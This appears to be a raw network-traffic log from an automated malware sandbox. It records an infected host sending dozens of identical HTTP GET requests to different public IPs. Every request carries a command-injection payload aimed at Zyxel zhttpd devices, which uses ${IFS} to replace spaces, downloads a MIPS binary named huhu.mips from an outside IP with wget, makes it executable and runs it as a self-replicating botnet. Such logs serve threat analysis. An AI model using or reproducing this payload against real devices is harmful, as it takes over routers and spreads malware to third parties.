                                                  Jan 19, 2024 18:23:58.105465889 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5017192.168.2.135787437.90.250.207443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:58.105520010 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5018192.168.2.135475287.199.252.174443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:58.105575085 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5019192.168.2.1353512186.114.50.33443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:58.105595112 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5020192.168.2.133629884.184.195.162443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:58.105638027 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5021192.168.2.1340896183.3.248.97443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:58.105676889 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5022192.168.2.135683645.28.202.103443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:58.105715990 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5023192.168.2.1360508200.248.124.80443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:58.105746031 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5024192.168.2.135666227.232.118.74443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:58.105782986 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5025192.168.2.1357898210.192.178.31443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:58.105817080 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5026192.168.2.1356452117.193.39.181443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:58.105858088 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5027192.168.2.1336534168.90.89.207443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:58.105905056 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5028192.168.2.1351048187.230.154.16443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:58.105926037 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5029192.168.2.1346594104.137.191.169443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:58.105974913 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5030192.168.2.1338968206.245.204.155443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:58.106025934 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5031192.168.2.135517432.1.197.24443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:58.106054068 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5032192.168.2.1341034138.68.122.142443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:58.106077909 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5033192.168.2.1341616170.150.164.210443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:58.106122971 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5034192.168.2.134014895.90.60.155443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:58.106147051 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5035192.168.2.1349530153.86.97.134443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:58.106184006 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5036192.168.2.1339512175.171.84.79443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:58.106239080 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5037192.168.2.1354130212.59.6.83443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:58.106280088 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5038192.168.2.1343460134.14.237.53443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:58.106307983 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5039192.168.2.1341828165.184.34.140443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:58.106355906 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5040192.168.2.1346112105.182.219.88443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:58.106389999 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5041192.168.2.1345358106.79.176.132443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:58.106445074 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5042192.168.2.1354504106.88.139.118443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:58.106482029 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5043192.168.2.134602614.31.102.144443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:58.106520891 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5044192.168.2.133883262.115.156.171443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:58.106559992 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5045192.168.2.133961846.222.246.85443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:58.106606007 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5046192.168.2.134197017.237.241.89443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:58.106666088 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5047192.168.2.1336008118.80.196.211443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:58.106687069 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5048192.168.2.1346980184.21.133.60443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:58.106728077 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5049192.168.2.1334104222.162.235.54443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:58.106772900 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5050192.168.2.136032875.22.122.17443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:58.106826067 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5051192.168.2.1345296221.176.172.21443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:58.106843948 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5052192.168.2.1333046168.11.60.6443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:58.106872082 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5053192.168.2.1348538150.35.192.252443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:58.106926918 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5054192.168.2.1335526195.157.77.104443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:58.106954098 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5055192.168.2.136021670.225.52.202443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:58.107004881 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5056192.168.2.1360046136.86.95.197443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:58.107031107 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5057192.168.2.135989867.178.114.61443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:58.107083082 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5058192.168.2.135302277.211.248.183443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:58.107114077 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5059192.168.2.135537663.43.223.230443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:58.107158899 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5060192.168.2.1359096187.203.23.184443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:58.107208967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5061192.168.2.134270035.10.150.12443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:58.107261896 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5062192.168.2.1355262141.86.179.113443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:58.107305050 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5063192.168.2.1341282122.139.162.152443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:58.107352972 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5064192.168.2.1342854123.42.216.20443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:58.107405901 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5065192.168.2.133557684.10.64.16443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:58.107433081 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5066192.168.2.1346720152.236.50.227443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:58.107451916 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5067192.168.2.1358108148.169.47.39443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:58.107500076 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5068192.168.2.1332952181.35.22.8443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:58.107541084 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5069192.168.2.1347352217.3.100.55443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:58.107577085 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5070192.168.2.13380348.100.58.17443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:58.107625008 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5071192.168.2.1344774111.60.33.227443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:58.107664108 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5072192.168.2.136054020.166.143.114443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:58.107701063 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5073192.168.2.1355362212.188.187.224443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:58.107741117 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5074192.168.2.1339800144.216.137.114443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:58.107791901 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5075192.168.2.1360670218.62.77.114443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:58.107827902 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5076192.168.2.1358684174.166.127.205443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:58.107871056 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5077192.168.2.1333458142.27.98.71443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:58.107883930 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5078192.168.2.134728424.188.242.233443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:58.107932091 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5079192.168.2.134044254.51.255.36443
                                                  TimestampBytes transferredDirectionData
